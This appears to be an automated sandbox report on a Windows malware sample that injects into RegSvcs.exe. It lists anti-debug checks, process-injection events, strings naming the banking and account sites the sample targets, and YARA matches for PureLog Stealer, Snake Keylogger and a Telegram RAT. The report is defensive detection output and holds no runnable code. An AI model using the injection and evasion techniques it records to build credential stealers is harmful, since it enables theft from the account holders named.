Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597904	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597790	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597527	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597399	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596712	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595498	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595277	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594078	Jump to behavior

Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: C5JLkBS1CX.exe, 00000003.00000003.2153416868.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareworkstation.exe
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: RegSvcs.exe, 00000004.00000002.4581223186.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{.U
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: RegSvcs.exe, 00000004.00000002.4583666104.00000000041DB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: RegSvcs.exe, 00000004.00000002.4583666104.0000000004237000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00653F09 BlockInput,

0_2_00653F09

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_005E3B3A

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00615A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00615A7C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

4_2_004019F0

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E4B37 LoadLibraryA,GetProcAddress,

0_2_005E4B37

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0118B358 mov eax, dword ptr fs:[00000030h]	0_2_0118B358
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0118B2F8 mov eax, dword ptr fs:[00000030h]	0_2_0118B2F8
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_01189CE8 mov eax, dword ptr fs:[00000030h]	0_2_01189CE8
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 3_2_0108F250 mov eax, dword ptr fs:[00000030h]	3_2_0108F250
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 3_2_0108DBE0 mov eax, dword ptr fs:[00000030h]	3_2_0108DBE0
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 3_2_0108F1F0 mov eax, dword ptr fs:[00000030h]	3_2_0108F1F0

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_006380A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_006380A9

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0060A155
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Code function: 0_2_0060A124 SetUnhandledExceptionFilter,	0_2_0060A124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4_2_004123F1 SetUnhandledExceptionFilter,	4_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B95008

Jump to behavior

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_006387B1 LogonUserW,

0_2_006387B1

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_005E3B3A

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_005E48D7

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00644C7F mouse_event,

0_2_00644C7F

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"			Jump to behavior
Source: C:\Users\user\Desktop\C5JLkBS1CX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\C5JLkBS1CX.exe"			Jump to behavior

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00637CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00637CAF

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0063874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0063874B

Source: C5JLkBS1CX.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: C5JLkBS1CX.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_0060862B cpuid

0_2_0060862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

4_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00614E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00614E87

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00621E06 GetUserNameW,

0_2_00621E06

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_00613F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00613F3A

Source: C:\Users\user\Desktop\C5JLkBS1CX.exe

Code function: 0_2_005E49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_005E49A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4583666104.0000000003F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.4582299740.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4585202613.0000000005400000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4584785930.0000000005200000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4581535974.0000000002959000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 1708, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.2999a7e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.299a966.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.RegSvcs.exe.5200ee8.4.unpack, type: UNPACKEDPE
